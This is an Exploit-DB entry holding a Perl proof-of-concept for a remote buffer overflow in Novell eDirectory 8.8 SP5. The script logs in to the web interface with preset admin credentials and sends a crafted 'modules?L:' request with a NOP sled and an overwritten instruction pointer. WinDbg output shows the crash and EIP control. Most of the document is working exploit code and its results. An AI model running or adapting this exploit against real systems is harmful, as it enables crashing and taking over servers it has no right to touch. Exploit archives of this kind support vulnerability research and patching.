Novell eDirectory 8.8sp5 - Remote Buffer Overflow

EDB-ID:

9902

CVE:


EDB Verified:

Author:

karak0rsan, murderkey

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2009-10-26

Vulnerable App: 
#PoC for Vulnerability:
#!usr\bin\perl
#Novell eDirectory 8.8 SP5 BoF Vuln - 0day
#Vulnerability found in Hellcode Labs.
#karak0rsan || murderkey
#info[at]hellcode.net || www.hellcode.net
#to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)"
#http://www.youtube.com/watch?v=6bloyjV-Hhs

use WWW::Mechanize; 

use LWP::Debug qw(+);

use HTTP::Cookies;

$target=$ARGV[0]; 


if(!$ARGV[0]){

        print "Novell eDirectory 8.8 SP5 Exploit\n";

        print "Hellcode Research || Hellcode.net\n";

        print "Usage:perl $0 [target]\n";
	
exit();
}



$login_url = "$target/_LOGIN_SERVER_";

$url = "$target/dhost/";

$vuln = "modules?L:";

$nop = "\x90" x 1668;

$eip = "\xef\xbe\xad\xde";

$data = "B" x 235;


$hellcode = $vuln.$nop.$eip.$data;

########Write your usr and pwd########

	  $username = "Admin.context";
 
 	  $password = "1234"; 

 
my $mechanize = WWW::Mechanize->new();


$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));


$mechanize->timeout($url_timeout); 

$res = $mechanize->request(HTTP::Request->new('GET', "$login_url")); 


    $mechanize->submit_form( 

                  form_name => "authenticator", 

                  fields    => {        
            
                     usr => $username, 

                     pwd => $password}, 

                     button => 'Login'); 

$response2 = $mechanize->get("$url$hellcode");



##Debugger Results of PoC:

Windbg- File>Attach to a process>dhost.exe

eax=7ff43000 ebx=00000000 ecx=00000000 edx=778ad094 esi=00000000 edi=00000000
eip=77867dfe esp=1630ff5c ebp=1630ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
*** ERROR: Symbol file could not be found.  
Defaulted to export symbols for C:\Windows\system32\ntdll.dll - 
ntdll!DbgBreakPoint:
77867dfe cc              int     3
0:088> g

Debuggee is running...


##C:\Users\DELL\Videos\karak0rsan\Perl\bin>perl novelbof.pl

##Debugger Results after running poc:

(1cc.1d44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000042 ebx=15700796 ecx=038af878 edx=038b0000 esi=038af62c edi=038af878
eip=75c11684 esp=038af5c0 ebp=038af660 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  
Defaulted to export symbols for 
C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.3053_none_d08d7bba442a9b36\MSVCR80.dll - 
MSVCR80!vfwprintf_p+0x5b:
75c11684 8802            mov     byte ptr [edx],al          ds:0023:038b0000=??

-- EAX = 00000042 (writed a part of eax)

##0:010> g

(8e4.bb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=deadbeef edx=77879bad esi=00000000 edi=00000000
eip=deadbeef esp=036bf1f0 ebp=036bf210 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
deadbeef ??              ???

#EIP=deadbeef - We controled eip ;)
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services